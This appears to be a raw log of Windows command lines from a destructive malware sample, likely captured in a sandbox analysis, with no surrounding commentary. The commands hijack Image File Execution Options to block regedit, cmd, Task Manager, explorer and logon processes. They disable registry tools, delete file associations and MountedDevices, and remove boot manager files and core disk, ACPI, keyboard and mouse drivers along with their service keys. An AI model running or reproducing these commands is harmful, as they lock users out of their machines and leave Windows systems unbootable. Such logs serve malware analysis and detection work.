- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\regedit.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\mmc.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\cmd.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\shutdown.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\comfile /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.cmd /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\taskkill.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\taskmgr.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\bcdedit.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\bcdboot.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\control.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\diskpart.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\dism.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\diskperf.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\explorer.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\logonUI.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\khook.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\scrfile /f
- '<SYSTEM32>\cmd.exe' /c rd %WINDIR%\Boot\DVD\EFI
- '<SYSTEM32>\cmd.exe' /c rd %WINDIR%\Boot\DVD\PCAT
- '<SYSTEM32>\cmd.exe' /c rd <SYSTEM32>\Boot
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\MountedDevices /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\reg.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\acpi.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\comfile /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\acpi
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\acpipmi
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\disk.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\disk
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\hidusb.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\hidusb
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\hidclass.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\hidclass
- '<SYSTEM32>\cmd.exe' /c del %WINDIR%\Boot\EFI\bootmgr.efi
- '<SYSTEM32>\cmd.exe' /c del %WINDIR%\Boot\PCAT\bootmgr
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\kbdhid
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\kbdhid.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\kbdclass
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.sys /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.js /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\.js /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\sysfile /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCU\Software\Classes\sysfile /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\wininit.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\userinit.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\scrfile /f
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\khook
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\logoff.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\mouclass.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\mouclass
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\mouhid.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\mouhid
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\mountmgr.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKLM\SYSTEM\ControlSet002\services\mountmgr
- '<SYSTEM32>\cmd.exe' /c del <DRIVERS>\kbdclass.sys
- '<SYSTEM32>\cmd.exe' /c REG DELETE HKCR\.sys /f
- '<SYSTEM32>\cmd.exe' /c REG ADD HKLM\Software\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\wuauclt.exe /v debugger /t REG_SZ /d \\ /f
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\ControlSet002\services\pciide